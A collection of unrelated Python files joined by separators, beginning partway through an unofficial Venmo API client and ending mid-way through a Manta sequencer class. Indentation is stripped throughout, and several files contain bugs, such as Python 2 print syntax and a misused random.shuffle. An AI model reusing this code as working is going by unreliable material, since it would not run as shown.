response.raise_for_status()
return response.json()
def get_hermes_whitelist(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/hermes-whitelist', headers=headers)
response.raise_for_status()
return response.content
def search_user(self, user):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/users', params={'query':user}, headers=headers)
response.raise_for_status()
return response.json()
def get_back_accounts(self):
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://venmo.com/api/v5/bankaccounts', headers=headers)
response.raise_for_status()
return response.json()
def get_payment_methods(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/payment-methods', headers=headers)
response.raise_for_status()
return response.json()
def get_incomplete_requests(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
query_string_params = {
'action': 'charge',
'actor': self.external_id,
'limit': '20',
'status': 'pending,held'
}
response = self.session.get('https://api.venmo.com/v1/payments', params=query_string_params, headers=headers)
response.raise_for_status()
return response.json()
def get_incomplete_payments(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
query_string_params = {
'action': 'pay',
'actor': self.external_id,
'limit': '20',
'status': 'pending,held'
}
response = self.session.get('https://api.venmo.com/v1/payments', params=query_string_params, headers=headers)
response.raise_for_status()
return response.json()
def change_password(self, old_password, new_password):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
payload = {
"old_password": old_password,
"password": new_password
}
response = self.session.put(f'https://api.venmo.com/v1/users/{self.external_id}', json=payload, headers=headers)
response.raise_for_status()
return response.json()
def get_remembered_devices(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://venmo.com/api/v5/devices', headers=headers)
response.raise_for_status()
return response.json()
def forget_device(self, device_id):
"""
:param device_id: int - user_device_id key in response of get_remembered_devices method for a given device
"""
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.delete(f'https://venmo.com/api/v5/devices/{device_id}', headers=headers)
response.raise_for_status()
return response.json()
def change_number(self, new_number):
"""
:params new_number: str eg. "(123) 456-7890"
"""
# TODO I'm in Canada will flesh this out when I'm back state-side
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
payload = {
"phone": new_number
}
response = self.session.post('https://venmo.com/api/v5/phones', json=payload, headers=headers)
response.raise_for_status()
return response.json()
def get_blocked_users(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/blocks', headers=headers)
response.raise_for_status()
return response.json()
def make_all_past_transactions_private(self):
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
payload = {
"audience": "private"
}
response = self.session.post('https://venmo.com/api/v5/stories/each', json=payload, headers=headers)
response.raise_for_status()
return response.json()
def make_all_past_transactions_viewable_by_friends(self):
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
payload = {
"audience": "friends"
}
response = self.session.post('https://venmo.com/api/v5/stories/each', json=payload, headers=headers)
response.raise_for_status()
return response.json()
def edit_profile(self, first_name=None, last_name=None, username=None, email=None):
# TODO fetch currents so that we only pass through new/updated param to the payload
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
payload = {
"email": email,
"first_name": first_name,
"last_name": last_name,
"username": username
}
response = self.session.put('https://venmo.com/api/v5/users/me', json=payload, headers=headers)
response.raise_for_status()
return response.json()
def get_friends(self, limit=1337):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get(f'https://api.venmo.com/v1/users/{self.external_id}/friends', params={'limit':limit}, headers=headers)
response.raise_for_status()
return response.json()
def sign_out(self):
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.delete('https://venmo.com/api/v5/oauth/access_token', headers=headers)
response.raise_for_status()
return response.json()
root_directory = os.getcwd()
cfg = configparser.ConfigParser()
configFilePath = os.path.join(root_directory, 'config.cfg')
cfg.read(configFilePath)
venmo = Venmo()
venmo.login(cfg.get('login', 'username'), cfg.get('login', 'password'))
print(venmo.get_friends())
|
class store(object):
def __init__(self, products, location, owner):
self.products = products
self.location = location
self.owner = owner
def add_product(self, new_product):
self.products.append(new_product)
return self
def remove_product(self, remove_product):
remove_index = self.products.index(remove_product)
self.products.pop(remove_index)
return self
def inventory(self):
info = ""
for each in self.products:
info += "Product Name: " + each + "\n"
info += "Location: " + self.location + "\n"
info += "Owner: " + self.owner + "\n"
print info
return self
|
from rest_framework import serializers
from .models import Payment
class CategorySerializer(serializers.Serializer):
name = serializers.CharField(max_length=64)
description = serializers.CharField(max_length=1024)
url = serializers.CharField(max_length=64)
image = serializers.FileField()
class CompensationSerializer(serializers.Serializer):
name = serializers.CharField(max_length=64)
money = serializers.CharField(max_length=1024)
url = serializers.CharField(max_length=64)
requirements = serializers.CharField(max_length=2048)
additional_info = serializers.CharField(max_length=2048)
once_a_term = serializers.BooleanField(default=False)
category_url = serializers.CharField(max_length=64)
class PaymentSerializer(serializers.Serializer):
money = serializers.IntegerField()
compensation_id = serializers.SlugRelatedField(read_only=True, slug_field='name')
date = serializers.DateField()
class Meta:
model = Payment
fields = "__all__"
class StudentSerializer(serializers.Serializer):
email = serializers.EmailField()
name = serializers.CharField()
surname = serializers.CharField()
middlename = serializers.CharField()
group = serializers.CharField()
|
###
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .encoder import EncoderTest
class MPEG2EncoderTest(EncoderTest):
def before(self):
vars(self).update(
codec = "mpeg2",
ffenc = "mpeg2_vaapi",
hwupfmt = "nv12",
)
super(MPEG2EncoderTest, self).before()
def get_file_ext(self):
return "m2v"
def get_vaapi_profile(self):
return {
"simple" : "VAProfileMPEG2Simple",
"main" : "VAProfileMPEG2Main",
}[self.profile]
spec = load_test_spec("mpeg2", "encode")
class cqp(MPEG2EncoderTest):
@platform_tags(MPEG2_ENCODE_PLATFORMS)
@slash.requires(have_ffmpeg_mpeg2_vaapi_encode)
@slash.parametrize(*gen_mpeg2_cqp_parameters(spec, ['main', 'simple']))
def test(self, case, gop, bframes, qp, quality, profile):
slash.logger.notice("NOTICE: 'quality' parameter unused (not supported by plugin)")
vars(self).update(spec[case].copy())
vars(self).update(
bframes = bframes,
case = case,
gop = gop,
profile = profile,
qp = qp,
mqp = mapRange(qp, [0, 100], [1, 31]),
rcmode = "cqp",
)
self.encode()
|
import sys
tmp = sys.argv[1:]
from random import randint as rint
N = int(tmp[0])
Xmin = -rint(1, N*100)
Xmax = rint(1,N*100)
Ymin = -rint(1,N*100)
Ymax = rint(1,N*100)
filename = "test"
f = open(filename, "w+")
f.write(str(N) + '\n')
for i in range(N):
x = rint(Xmin, Xmax)
y = rint(Ymin, Ymax)
f.write(str(x) + ' ' + str(y) + '\n')
f.close()
|
from peewee import DateTimeField, BooleanField, ForeignKeyField
from model.BaseModel import BaseModel
from model.Mentor import Mentor
class InterviewSlot(BaseModel):
start_time = DateTimeField()
end_time = DateTimeField()
reserved = BooleanField()
mentor = ForeignKeyField(Mentor, related_name='interviewslot_mentor_id') |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn import svm
from sklearn.semi_supervised import label_propagation
from sklearn import decomposition
from sklearn import metrics
train = pd.read_csv("C:/Users/ASUS/Desktop/SVM/train.csv")
X = train.values[:, 1:]
y = train.values[:,0]
svmm = svm.SVC(kernel='rbf')
rbf_svc = (svmm.fit(X, y), y)
test = pd.read_csv("C:/Users/ASUS/Desktop/SVM/test.csv")
X_test = test.values[:, 1:]
y_test = test.values[:,0]
result = svmm.predict(X_test)
accuracy = metrics.accuracy_score(y_test,result)
print(accuracy)
print(result)
|
# -*- coding: utf-8 -*-
"""
Boxy Theme Presets
"""
import sublime
import sublime_plugin
from collections import OrderedDict
NO_SELECTION = -1
PREFERENCES = 'Preferences.sublime-settings'
OPTIONS = [
'theme_accent_blue',
'theme_accent_cyan',
'theme_accent_green',
'theme_accent_lime',
'theme_accent_orange',
'theme_accent_pink',
'theme_accent_purple',
'theme_accent_sky',
'theme_accent_tangerine',
'theme_autocomplete_item_selected_colored',
'theme_bar',
'theme_bar_colored',
'theme_bar_logo_atomized',
'theme_bar_logo_materialized',
'theme_bar_margin_top_lg',
'theme_bar_margin_top_md',
'theme_bar_margin_top_sm',
'theme_bar_shadow_hidden',
'theme_button_rounded',
'theme_dirty_materialized',
'theme_dirty_accent_blue',
'theme_dirty_accent_green',
'theme_dirty_accent_orange',
'theme_dirty_accent_purple',
'theme_dirty_accent_tangerine',
'theme_dirty_accent_cyan',
'theme_dirty_accent_lime',
'theme_dirty_accent_pink',
'theme_dirty_accent_sky',
'theme_dropdown_atomized',
'theme_dropdown_materialized',
'theme_find_panel_atomized',
'theme_find_panel_close_hidden',
'theme_find_panel_font_lg',
'theme_find_panel_font_md',
'theme_find_panel_font_sm',
'theme_find_panel_font_xl',
'theme_find_panel_font_xs',
'theme_find_panel_materialized',
'theme_find_panel_padding_lg',
'theme_find_panel_padding_md',
'theme_find_panel_padding_sm',
'theme_find_panel_padding_xl',
'theme_find_panel_padding_xs',
'theme_find_panel_size_lg',
'theme_find_panel_size_md',
'theme_find_panel_size_sm',
'theme_find_panel_size_xl',
'theme_find_panel_size_xs',
'theme_font_lg',
'theme_font_md',
'theme_font_sm',
'theme_font_xl',
'theme_font_xs',
'theme_grid_border_size_lg',
'theme_grid_border_size_md',
'theme_grid_border_size_sm',
'theme_grid_border_size_xl',
'theme_grid_border_size_xs',
'theme_icon_button_highlighted',
'theme_icons_atomized',
'theme_icons_materialized',
'theme_panel_switcher_atomized',
'theme_panel_switcher_materialized',
'theme_popup_border_visible',
'theme_quick_panel_item_selected_colored',
'theme_quick_panel_size_lg',
'theme_quick_panel_size_md',
'theme_quick_panel_size_sm',
'theme_quick_panel_size_xl',
'theme_quick_panel_size_xs',
'theme_scrollbar_colored',
'theme_scrollbar_line',
'theme_scrollbar_rounded',
'theme_sidebar_border',
'theme_sidebar_close_always_visible',
'theme_sidebar_disclosure',
'theme_sidebar_file_icons_hidden',
'theme_sidebar_folder_arrow',
'theme_sidebar_folder_atomized',
'theme_sidebar_folder_materialized',
'theme_sidebar_folder_mono',
'theme_sidebar_font_lg',
'theme_sidebar_font_md',
'theme_sidebar_font_sm',
'theme_sidebar_font_xl',
'theme_sidebar_font_xs',
'theme_sidebar_heading_bold',
'theme_sidebar_highlight_selected_text_only',
'theme_sidebar_highlight_text_only',
'theme_sidebar_icon_saturation_hg',
'theme_sidebar_icon_saturation_lw',
'theme_sidebar_icon_saturation_md',
'theme_sidebar_icon_saturation_xh',
'theme_sidebar_indent_lg',
'theme_sidebar_indent_md',
'theme_sidebar_indent_sm',
'theme_sidebar_indent_top_level_disabled',
'theme_sidebar_indent_xl',
'theme_sidebar_indent_xs',
'theme_sidebar_size_lg',
'theme_sidebar_size_md',
'theme_sidebar_size_sm',
'theme_sidebar_size_xl',
'theme_sidebar_size_xs',
'theme_sidebar_size_xxs',
'theme_size_lg',
'theme_size_md',
'theme_size_sm',
'theme_size_xl',
'theme_size_xs',
'theme_statusbar_colored',
'theme_statusbar_font_lg',
'theme_statusbar_font_md',
'theme_statusbar_font_sm',
'theme_statusbar_font_xl',
'theme_statusbar_font_xs',
'theme_statusbar_label_bold',
'theme_statusbar_size_lg',
'theme_statusbar_size_md',
'theme_statusbar_size_sm',
'theme_statusbar_size_xl',
'theme_statusbar_size_xs',
'theme_tab_arrows_hidden',
'theme_tab_close_always_visible',
'theme_tab_font_lg',
'theme_tab_font_md',
'theme_tab_font_sm',
'theme_tab_font_xl',
'theme_tab_font_xs',
'theme_tab_highlight_text_only',
'theme_tab_label_bold',
'theme_tab_line_size_lg',
'theme_tab_line_size_sm',
'theme_tab_mouse_wheel_switch',
'theme_tab_rounded',
'theme_tab_selected_filled',
'theme_tab_selected_label_bold',
'theme_tab_selected_prelined',
'theme_tab_selected_transparent',
'theme_tab_selected_underlined',
'theme_tab_separator',
'theme_tab_size_lg',
'theme_tab_size_md',
'theme_tab_size_sm',
'theme_tab_size_xl',
'theme_tab_size_xs',
'theme_tab_width_auto',
'theme_tooltips_font_lg',
'theme_tooltips_font_md',
'theme_tooltips_font_sm',
'theme_tooltips_font_xl',
'theme_tooltips_font_xs'
]
PRESETS = OrderedDict(
[
(
'Default',
[]
),
(
'Atom',
[
'theme_accent_sky',
'theme_button_rounded',
'theme_find_panel_close_hidden',
'theme_grid_border_size_lg',
'theme_icon_button_highlighted',
'theme_icons_atomized',
'theme_popup_border_visible',
'theme_scrollbar_rounded',
'theme_sidebar_disclosure',
'theme_sidebar_indent_top_level_disabled',
'theme_tab_rounded',
'theme_tab_selected_prelined',
'theme_tab_separator'
]
),
(
'Predawn',
[
'theme_accent_tangerine',
'theme_autocomplete_item_selected_colored',
'theme_dirty_materialized',
'theme_dropdown_atomized',
'theme_icon_button_highlighted',
'theme_panel_switcher_atomized',
'theme_quick_panel_item_selected_colored',
'theme_scrollbar_colored',
'theme_scrollbar_line',
'theme_sidebar_close_always_visible',
'theme_sidebar_folder_atomized',
'theme_sidebar_folder_mono',
'theme_tab_close_always_visible',
'theme_tab_line_size_lg',
'theme_tab_selected_transparent',
'theme_tab_selected_underlined'
]
),
(
'Material',
[
'theme_accent_lime',
'theme_bar',
'theme_bar_colored',
'theme_bar_logo_atomized',
'theme_button_rounded',
'theme_icons_materialized',
'theme_scrollbar_rounded',
'theme_sidebar_highlight_selected_text_only',
'theme_sidebar_highlight_text_only',
'theme_sidebar_indent_top_level_disabled',
'theme_tab_highlight_text_only',
'theme_tab_line_size_lg',
'theme_tab_selected_transparent',
'theme_tab_selected_underlined'
]
),
(
'Code',
[
'theme_accent_purple',
'theme_bar',
'theme_sidebar_disclosure',
'theme_sidebar_indent_sm',
'theme_statusbar_colored',
'theme_tab_highlight_text_only'
]
)
]
)
def get_options(prefs):
opts = []
get_opt = prefs.get
append_opt = opts.append
for opt in OPTIONS:
if get_opt(opt) is True:
append_opt(opt)
erase_options(prefs)
return opts
def set_options(prefs, opts):
set_opt = prefs.set
for opt in opts:
set_opt(opt, True)
def erase_options(prefs):
erase_opt = prefs.erase
for opt in OPTIONS:
erase_opt(opt)
def disable_preset(prefs, opts):
erase_opt = prefs.erase
for opt in opts:
erase_opt(opt)
def revert_options(prefs, opts):
erase_options(prefs)
set_options(prefs, opts)
def preview_preset(prefs, opts):
set_options(prefs, opts)
def activate_preset(prefs, opts):
commit()
def commit():
return sublime.save_settings(PREFERENCES)
class BoxyPresetsCommand(sublime_plugin.WindowCommand):
def display_list(self, presets):
self.presets = presets
self.prefs = sublime.load_settings(PREFERENCES)
self.initial_options = get_options(self.prefs)
self.previous_index = -1
quick_list = [preset for preset in self.presets]
self.quick_list = quick_list
self.window.show_quick_panel(quick_list, self.on_done, on_highlight=self.on_highlighted)
def on_highlighted(self, index):
if self.previous_index != -1:
sublime.set_timeout_async(disable_preset(self.prefs, self._quick_list_to_preset(self.previous_index)), 0)
sublime.set_timeout_async(preview_preset(self.prefs, self._quick_list_to_preset(index)), 0)
self.previous_index = index
def on_done(self, index):
if index is NO_SELECTION:
revert_options(self.prefs, self.initial_options)
return
preset = self._quick_list_to_preset(index)
activate_preset(self.prefs, preset)
def _quick_list_to_preset(self, index):
return self.presets[self.quick_list[index]]
def run(self):
self.display_list(PRESETS)
|
import autodisc as ad
from autodisc.cppn.selfconnectiongenome import SelfConnectionGenome
import neat
import copy
import random
class TwoDMatrixCCPNNEATEvolution:
@staticmethod
def default_config():
def_config = ad.Config()
def_config.neat_config_file = 'neat.cfg'
def_config.matrix_size = (100, 100)
def_config.cppn_input_borders = ((-2,2), (-2,2))
def_config.recurrent_net_repetitions = 4 # number of iterations a recurrent nerual network is executed
def_config.n_generations = 1
def_config.is_verbose = False
def_config.is_extra_fitness_data = False # does the fitness function returns extra data that should be saved
def_config.is_pytorch = True
def_config.keep_results = 'none' # 'none', 'all_gen', 'last_gen'
def_config.fitness_function = lambda matrix, genome: 0
def_config.fitness_function_param = None
return def_config
def __init__(self, init_population=None, config=None, **kwargs):
'''
Configuration:
keep_results: Defines if the results of the exploration should be kept.
Options:
- 'none' (default)
- 'all_gen': keep results from all generations
- 'last_gen': keep results from last generation
fitness_function: Function pointer to fitness function. Form: [fitness (,data)] = fitness_function(matrix, genome (, fitness_function_param)).
Set config.is_extra_fitness_data to True if extra data is returned.
fitness_function_param: Optional parameter for the fitness function. Can be used to configure the function.
:param init_population: List of genomes that are used as initial population.
If less are given than pop_size, the others are randomly generated. If more are given, then the elements will be randomly chosen.
:param config: Configuration
'''
self.config = ad.config.set_default_config(kwargs, config, TwoDMatrixCCPNNEATEvolution.default_config())
if init_population is not None and not isinstance(init_population, list):
init_population = [init_population]
self.generation = -1
self.neat_config = neat.Config(SelfConnectionGenome,
neat.DefaultReproduction,
neat.DefaultSpeciesSet,
neat.DefaultStagnation,
self.config.neat_config_file)
# add userdefined activation functions
self.neat_config.genome_config.add_activation('delphineat_gauss', ad.cppn.activations.delphineat_gauss_activation)
self.neat_config.genome_config.add_activation('delphineat_sigmoid', ad.cppn.activations.delphineat_sigmoid_activation)
# regular neat evolution can not handle population size of 1
if self.neat_config.pop_size == 1:
self.is_single_cppn_evolution = True
# population is a single genome
if init_population is None:
self.population = self.neat_config.genome_type(0)
self.population.configure_new(self.neat_config.genome_config)
else:
self.population = copy.deepcopy(random.choice(init_population))
# hold best genome here
if self.neat_config.fitness_criterion == 'max':
self.fitness_criterion = lambda g1, g2: g2 if g2.fitness > g1.fitness else g1
elif self.neat_config.fitness_criterion == 'min':
self.fitness_criterion = lambda g1, g2: g2 if g2.fitness < g1.fitness else g1
else:
raise ValueError('Usupported fitness criterion {!r}! Evolutions with population size of 1 supports only \'min\' or \'max\'.'.format(self.neat_config.fitness_criterion))
self.best_genome = self.population
else:
self.is_single_cppn_evolution = False
if init_population is None:
self.population = neat.Population(self.neat_config)
else:
# if more elements in init list than population size, use random order
if len(init_population) <= self.neat_config.pop_size:
init_population_tmp = init_population
else:
init_population_tmp = random.shuffle(init_population.copy())
population = {}
# if there are randomly generated genomes, use for their keys new keys
next_key = max([genome.key for genome in init_population_tmp]) + 1
for idx in range(self.neat_config.pop_size):
if idx < len(init_population_tmp):
genome = copy.deepcopy(init_population_tmp[idx])
else:
genome = self.neat_config.genome_type(0)
genome.configure_new(self.neat_config.genome_config)
genome.key = next_key
next_key += 1
population[genome.key] = genome
species = config.species_set_type(self.neat_config.species_set_config, neat.reporting.ReporterSet())
species.speciate(neat.config, population, 0)
initial_state = (population, species, 0)
self.population = neat.Population(self.neat_config, initial_state)
for genome_key in population.keys():
self.population.population.reproduction.ancestors[genome_key] = tuple()
if self.config['is_verbose'] and not self.is_single_cppn_evolution:
# Add a stdout reporter to show progress in the terminal.
self.population.add_reporter(neat.StdOutReporter(True))
self.statistics_reporter = neat.StatisticsReporter()
self.population.add_reporter(self.statistics_reporter)
# save some config parametrs as variables for increased performance
self.matrix_size = self.config.matrix_size
self.recurrent_net_repetitions = self.config.recurrent_net_repetitions
self.is_extra_fitness_data = self.config.is_extra_fitness_data
if self.config.keep_results.lower() == 'none':
self.is_keep_all_gen_results = False
self.is_keep_last_gen_results = False
elif self.config.keep_results.lower() == 'all_gen':
self.is_keep_all_gen_results = True
self.is_keep_last_gen_results = False
elif self.config.keep_results.lower() == 'last_gen':
self.is_keep_all_gen_results = False
self.is_keep_last_gen_results = True
else:
raise ValueError('Unknown keep_results configuration {!r}!. Allowed values: none, all_gen, last_gen', self.config.keep_results)
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
self.results = dict()
else:
self.results = None
self.net_input = ad.cppn.helper.create_image_cppn_input(self.matrix_size, input_borders=self.config.cppn_input_borders)
def get_best_genome(self):
if self.is_single_cppn_evolution:
return self.best_genome
else:
return self.population.best_genome
def get_best_genome_last_generation(self):
if self.is_single_cppn_evolution:
return self.population
else:
max_fitness = float('-inf')
max_fitness_idx = None
for idx, genome in enumerate(self.population):
if genome.fitness > max_fitness:
max_fitness = genome.fitness
max_fitness_idx = idx
return self.population[max_fitness_idx]
def get_best_matrix(self):
# TODO: save best matrix immediately after it was generated, so that this computation can be avoided
best_genome = self.get_best_genome()
return self.genome_to_matrix(best_genome, self.neat_config)
def get_best_matrix_last_generation(self):
# TODO: save best matrix immediately after it was generated, so that this computation can be avoided
best_genome = self.get_best_genome_last_generation()
return self.genome_to_matrix(best_genome, self.neat_config)
def do_evolution(self, n_generations=None):
self.generation = -1
# use default number from config if nothing is given
if n_generations is None:
n_generations = self.config.n_generations
for _ in range(n_generations):
self.do_next_generation()
def do_next_generation(self):
self.generation += 1
if self.is_single_cppn_evolution:
# use the initialized genome for the first generation
if self.generation > 0:
self.population = copy.deepcopy(self.population)
self.population.key = self.generation
self.population.mutate(self.neat_config.genome_config)
self.eval_population_fitness([(self.population.key, self.population)], self.neat_config)
# update best genome according to the fitness criteria
self.best_genome = self.fitness_criterion(self.best_genome, self.population)
else:
self.population.run(self.eval_population_fitness, 1)
if self.is_keep_last_gen_results and self.generation > 0:
del(self.results[self.generation-1])
def eval_population_fitness(self, genomes, neat_config):
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
results = []
for (genome_id, genome) in genomes:
mat = self.genome_to_matrix(genome, neat_config)
if (self.is_keep_last_gen_results or self.is_keep_all_gen_results) and self.is_extra_fitness_data:
if self.config.fitness_function_param is None:
[genome.fitness, extra_data] = self.config.fitness_function(mat, genome)
else:
[genome.fitness, extra_data] = self.config.fitness_function(mat, genome, self.config.fitness_function_param)
else:
if self.config.fitness_function_param is None:
genome.fitness = self.config.fitness_function(mat, genome)
else:
genome.fitness = self.config.fitness_function(mat, genome, self.config.fitness_function_param)
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
result = dict()
result['id'] = genome.key
result['genome'] = genome
result['matrix'] = mat
result['fitness'] = genome.fitness
if self.is_extra_fitness_data:
result['data'] = extra_data
results.append(result)
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
self.results[self.generation] = results
def genome_to_matrix(self, genome, neat_config):
if self.config['is_pytorch']:
if neat_config.genome_config.feed_forward:
raise NotImplementedError('Feedforward networks for pytorch are not implemented!')
else:
net = ad.cppn.pytorchcppn.RecurrentCPPN.create_from_genome(genome, neat_config)
net_output = net.activate(self.net_input, self.recurrent_net_repetitions)
else:
if neat_config.genome_config.feed_forward:
net = neat.nn.FeedForwardNetwork.create(genome, neat_config)
net_output = ad.cppn.helper.calc_neat_forward_image_cppn_output(net, self.net_input)
else:
net = neat.nn.RecurrentNetwork.create(genome, neat_config)
net_output = ad.cppn.helper.calc_neat_recurrent_image_cppn_output(net, self.net_input, self.recurrent_net_repetitions)
mat = ad.cppn.helper.postprocess_image_cppn_output(self.matrix_size, net_output)
return mat |
from rest_framework import serializers
from film.models import origin
class originSerializers(serializers.ModelSerializer):
class Meta:
model = origin
fields = '__all__'
class originOnSerializers(serializers.ModelSerializer):
class Meta:
model = origin
fields = ['name']
|
"""
This module will manage Command Line Interface (CLI) for gpio-monitor.
It will parse argument and build a configuration reference for gpio-monitor.
For more information about argparse, see https://docs.python.org/3/library/argparse.html
"""
import argparse
class Config: # pylint: disable=too-few-public-methods
"""
Config class will be use to store configuration give by user
"""
def __init__(self):
"""
initialise class
"""
parser = argparse.ArgumentParser(description='monitor some GPIO from Rasberry Pi')
parser.add_argument('--led', metavar='led', type=int,
help='led pin number')
parser.add_argument('--button', metavar='button', type=int,
help='button pin number')
options = parser.parse_args()
self.config = {
'led': options.led,
'button': options.button
}
def display(self):
"""
display current configuration
"""
print('Configuration items')
for item in self.config:
print('{}: {}'.format(item, self.config[item]))
|
from django.apps import AppConfig
class MusicrunConfig(AppConfig):
name = 'musicRun'
|
import math
a = 1
b = 1
if a == b:
print ('1 through 10')
a = 11
while a > 1:
a = a - 1
print(a)
def factorial(a):
b = a
while b > 1:
b = b - 1
a = a * b
return a
print(factorial(11))
def nchoosek(n,k):
f = factorial(n)/(factorial(n-k)*factorial(k))
return f
print(nchoosek(5,2))
print(math.cos(math.pi))
|
from manta import note_from_pad, OFF, AMBER, RED, pad_from_note
class MantaSeqState(object):
def __init__(self, manta_seq):
self.manta_seq = manta_seq
def process_step_press(self, step_num):
pass
def process_step_release(self, step_num):
pass
def process_shift_press(self):
pass
def process_shift_release(self):
pass
def process_note_value(self, note_pad, value):
pass
def process_note_velocity(self, note_pad, velocity):
pass
def process_slider_value(self, slider_num, value):
pass
def process_slider_release(self, slider_num):
pass
def set_note_intensity_from_step_num(self, step_num, on):
'''if on is True, the intensity is set from the steps velocity.
if on is False, the intensity is set to zero'''
step = self.manta_seq._seq.steps[step_num]
if step.velocity > 0:
if on:
intensity = step.velocity
else:
